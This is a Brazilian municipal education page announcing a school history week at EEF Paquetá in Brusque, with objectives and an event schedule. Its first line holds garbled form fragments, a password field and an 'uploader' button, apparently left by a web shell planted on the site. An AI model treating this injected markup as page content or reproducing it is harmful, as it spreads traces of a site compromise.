POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" III SEMANA DA HISTÓRIA DA EEF PAQUETÁ – Secretaria de Educação de Brusque
Weather:
HomeCIDADANIAIII SEMANA DA HISTÓRIA DA EEF PAQUETÁ

III SEMANA DA HISTÓRIA DA EEF PAQUETÁ

Brusque foi fundada em 1860 por imigrantes europeus e nos anos seguintes recebeu levas imigratórias tendo por base de sua pirâmide populacional alemães, italianos, poloneses e irlandeses.

Na última década do século XXI, a população de nossa cidade aumentou 40%. Estabeleceram-se aqui migrantes de várias partes do Brasil: são gaúchos, paranaenses, paulistas, paraenses, nordestinos, entre tantos outros brasileiros, que da mesma forma que os imigrantes do passado, buscam em nossa cidade uma oportunidade de emprego, no anseio de construir aqui uma vida melhor e mais feliz.

Neste contexto, percebemos que a identidade histórica e cultural da cidade abordada no currículo escolar, estava um tanto que distante do cotidiano dos alunos dos anos finais do ensino fundamental, público-alvo deste projeto. Os estudantes não conseguem estabelecer uma conexão entre sua história pessoal e a história coletiva, pois muitos não têm vínculos históricos com a cidade.

Diante disso, entendemos que este projeto vem contribuir na formação cultural e histórica dos alunos, dando significado e resignificando a realidade na qual estão inseridos.

OBJETIVOS:

– possibilitar às crianças mecanismos que vinculem suas experiências pessoais com a das gerações passadas;

– exercitar um olhar mais atento sobre a arquitetura local;

– valorizar o patrimônio histórico da região;

– aprofundar os conhecimentos sobre a trajetória da cidade de Brusque, estabelecendo relações entre diferentes áreas do conhecimento.

– tornar possível uma aprendizagem significativa relacionando o que os alunos já sabiam e suas hipóteses com a temática que foi explorada;

– conhecer as características fundamentais de Brusque nas dimensões sociais, materiais e culturais como meio para construir progressivamente a noção de identidade municipal e pessoal;

– promover o desenvolvimento de sujeitos capazes de realizar uma leitura do contexto histórico-cultural, por meio de acesso à construção do conhecimento histórico, numa perspectiva crítica e reflexiva, contribuindo, assim, para o exercício da cidadania;

– conhecer personalidades que atuem em Brusque e que se destacam em diferentes áreas tais como, artística, profissional, empresarial, contribuindo diariamente para a formação da identidade do povo brusquense.

CALENDÁRIO DE EVENTOS:
01 DE AGOSTO (terça-feira)
MATUTINO:
9:45h – FAMÍLIA PELO MUNDO – CONVERSA COM A FAMÍLIA TOMASI SOBRE A EXPERIÊNCIA DE VIAJAR PELO MUNDO À BORDO DE UM FURGÃO COM A FAMÍLIA.

VESPERTINO:
14h – PROFESSOR THIAGO SANTOS COELHO E EQUIPE DE GINÁSTICA DA ABGR (ASSOCIAÇÃO BRUSQUENSE DE GINÁSTICA RÍTMICA)
Público: todas as turmas.

02 DE AGOSTO (quarta-feira)
9:45h – ESCRITOR E DESENHISTA ALDO MAES DOS ANJOS

VESPERTINO:
15:30h – JEEP CLUBE DE BRUSQUE E A HISTÓRIA DA FENAJEEP
Público: turmas do 4º e 5º ano e turmas dos anos finais.

03 DE AGOSTO (quinta-feira)

8h – HOMENAGEM CÍVICA NA ESCOLA – 4º ANO A/B PROFª GRACIELI

04 DE AGOSTO (sexta-feira)
DESFILE EM COMEMORAÇÃO AOS 157 ANOS DE BRUSQUE.